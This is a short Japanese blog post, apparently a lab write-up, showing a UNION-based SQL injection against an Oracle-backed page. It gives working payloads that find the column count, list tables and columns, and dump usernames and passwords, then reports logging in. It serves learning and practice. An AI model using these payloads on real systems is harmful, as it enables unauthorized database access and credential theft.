shikata ga nai

Private? There is no such things.

SQL injection attack, listing the database contents on Oracleをやってみた

Hello there, ('ω')ノ 

 

SQLインジェクション攻撃、Oracle上のデータベースコンテンツの一覧表示を。

UNION攻撃を使用して他のテーブルからデータを取得できるとのことで。

まずは、ページにアクセスして。

 

f:id:ThisIsOne:20210406154936p:plain

 

下記のペイロードからカラム数を確定して。

 '+UNION+SELECT+'abc','def'+FROM+DUAL--

 

f:id:ThisIsOne:20210406155104p:plain

 

下記のペイロードからテーブル名を取得して。

ユーザ情報らしきテーブルを見つけ出して。

 '+UNION+SELECT+table_name,NULL+FROM+all_tables--

 

f:id:ThisIsOne:20210406161921p:plain

 

ユーザテーブルからカラムを取得して。

 '+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_NIPDMQ'--

 

f:id:ThisIsOne:20210406161826p:plain


下記のペイロードからパスワードを取得して。 

 '+UNION+SELECT+USERNAME_TOUUIN,PASSWORD_CBMLDK+FROM+USERS_NIPDMQ--

 

f:id:ThisIsOne:20210406160641p:plain

 

 ログインして。

 

f:id:ThisIsOne:20210406161129p:plain


クリアできた。

 

f:id:ThisIsOne:20210406161054p:plain


Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain